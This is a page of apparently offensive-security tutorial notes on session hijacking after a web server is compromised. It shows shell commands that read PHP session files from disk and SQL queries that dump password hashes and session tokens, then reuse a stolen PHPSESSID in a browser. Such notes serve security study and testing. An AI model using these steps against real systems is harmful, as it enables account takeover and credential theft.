SESSION HIJACKING

session identifiers and session data can be retrieved from either a web server's disk or memory after the attacker has compromised a web server. although more impactful actions can be taken, there is some value to this post-exploitation method as it can be used in future attacks.

WEB SERVER ACCESS

PHP

root@target:~$ locate php.ini
 /etc/php/7.4/apache2/php.ini
 /etc/php/7.4/cli/php.ini
 ...
root@target:~$ cat /etc/php/7.4/cli/php.ini | grep 'session.save_path'
 ;session.save_path = "N;/path"
 ;session.save_path = "N;MODE;/path"
 ;session.save_path = "/var/lib/php/sessions"
 
root@target:~$ cat /etc/php/7.4/apache2/php.ini | grep 'session.save_path'
 ;session.save_path = "N;/path"
 ;session.save_path = "N;MODE;/path"
 ;session.save_path = "/var/lib/php/sessions"
 
 * note that a victim has to be authenticated for the attackers to view their session identifier
 
 * the files an attacker will search for use the name convention sess_<sessionID>
    - the same PHP session identifier when viewed on the browser may look like...
       Name: PHPSESSID   Value: s6kitq8d3071rmvbfitpim9mm   Domain: 192..  Path: /
    - the same PHP session identifier when viewed on the web server may look like...
       sess_s6kitq8d3071rmvbfitpim9mm
       
root@target:~$ ls /var/lib/php/sessions
 sess_s6kitq8d3071rmvbfitpim9mm
root@target:~$ cat //var/lib/php/sessions/sess_s6kitq8d3071rmvbfitpim9mm
 username|s:5:"admin";#
 
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookie > {targetSite}
 Name: PHPSESSID
 Value: s6kitq8d3071rmvbfitpim9mm

JAVA

on java, the filename of the default session data file is SESSIONS.ser. more information

.NET

.net session identifiers and session data are stored at the following locations. more in-depth details:

The application worker process (aspnet_wp.exe) - This is the case in the InProc Session mode
StateServer (A Windows Service residing on IIS or a separate server) - This is the case in the OutProc Session mode
An SQL Server

DATABASE ACCESS

this method can also be done on an SQLi vulnerability

root@target:~$ 
MariaDB[(none)]> show databases;
 +-----------------+
 | Database        |
 +-----------------+
 | project         |
 | ...             |
 +-----------------+

MariaDB[(none)]> use project;
 ...

MariaDB[project]> show tables;
 +-----------------+
 | Database        |
 +-----------------+
 | sessions        |
 | users           |
 | ...             |
 +-----------------+
 
MariaDB [project]> select * from users;
 id  username          email            password
  1  test              test@gmail.com   098f6bcd4621d373cade4e832627b4f6
  2  admin             admin@admin.pwn  21232f297a57a5a743894a0e4a801fc3
  
  * these hashes will take time to crack
  
MariaDB [project]> select * from all_sessions
 id  name              session
  1  John              Johnsspecialh4x0rc00kie
  2  Ben               Benssup3rs3cretc00kie
  3  Developer (admin) develop3rl33tsp00ks

root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookie > {targetSite}
 Name: PHPSESSID
 Value: develop3rl33tsp00ks

PreviousCREDENTIAL ACCESS NextPASSWORD CRACKING

Last updated 2 months ago